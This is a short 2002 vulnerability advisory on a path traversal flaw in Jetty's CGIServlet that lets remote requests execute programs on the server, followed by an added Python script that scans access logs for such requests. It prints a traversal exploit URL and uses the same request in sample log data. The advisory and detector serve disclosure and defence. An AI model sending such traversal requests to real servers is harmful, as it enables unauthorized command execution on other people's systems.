
Jetty CGIServlet Arbitrary Command Execution
3rd Oct 2002 [SBWID-5730]
COMMAND

	Jetty CGIServlet Arbitrary Command Execution

SYSTEMS AFFECTED

	Jetty Servlet Container
	

	

PROBLEM

	From the advisory by Matt Moore [matt@westpoint.ltd.uk] [ID#:wp-02-0011]:
	

	Commands can be executed on the server by making requests like:
	

	http://jetty-server:8080/cgi-bin/..\..\..\..\..\..\winnt/notepad.exe
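
Added example (not part of the advisory and not Jetty code): a Python check over access-log lines that flags `/cgi-bin/` requests whose path contains a `..` segment when both `/` and `\` are treated as separators, as in the request above. The Common Log Format input, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not from the advisory.
SAMPLE_LOG = r'''
192.0.2.10 - - [03/Oct/2002:10:00:01 +0000] "GET /cgi-bin/hello.bat HTTP/1.0" 200 120
192.0.2.11 - - [03/Oct/2002:10:00:05 +0000] "GET /cgi-bin/..\..\..\winnt/notepad.exe HTTP/1.0" 200 0
192.0.2.12 - - [03/Oct/2002:10:00:09 +0000] "GET /cgi-bin/my%20script.bat HTTP/1.0" 200 88
192.0.2.13 - - [03/Oct/2002:10:00:12 +0000] "GET /docs/../index.html HTTP/1.0" 200 512
192.0.2.14 - - [03/Oct/2002:10:00:15 +0000] "GET /cgi-bin/report..v2.bat?dir=..\tmp HTTP/1.0" 200 64
'''.strip().splitlines()

CGI_PREFIX = "/cgi-bin/"  # prefix taken from the request shown in the advisory
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def has_parent_segment(target):
    """Return True if the path of a CGI request contains a '..' segment.

    Both '/' and '\\' count as separators, because the advisory's request
    mixes them. The query string is ignored; only the path selects the program.
    """
    path = unquote(target.split("?", 1)[0])  # decode once, then compare
    if not path.lower().startswith(CGI_PREFIX):
        return False  # this check is scoped to the CGI mapping only
    segments = re.split(r"[/\\]", path[len(CGI_PREFIX):])
    return ".." in segments  # whole-segment match, so 'report..v2.bat' passes


def suspicious_requests(lines):
    """Return (client, request target) pairs for flagged log lines."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and has_parent_segment(match.group("target")):
            hits.append((line.split()[0], match.group("target")))
    return hits


if __name__ == "__main__":
    for client, target in suspicious_requests(SAMPLE_LOG):
        print(client, target)
```

A hit with a 200 status on a host running a version older than the fixed release is worth following up on that server.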

	

SOLUTION

	The vendor responded quickly and has released a fixed version, 4.1.0,
	which can be downloaded from http://jetty.mortbay.org
	

	This advisory is available online at:
	

	http://www.westpoint.ltd.uk/advisories/wp-02-0011.txt

	

	
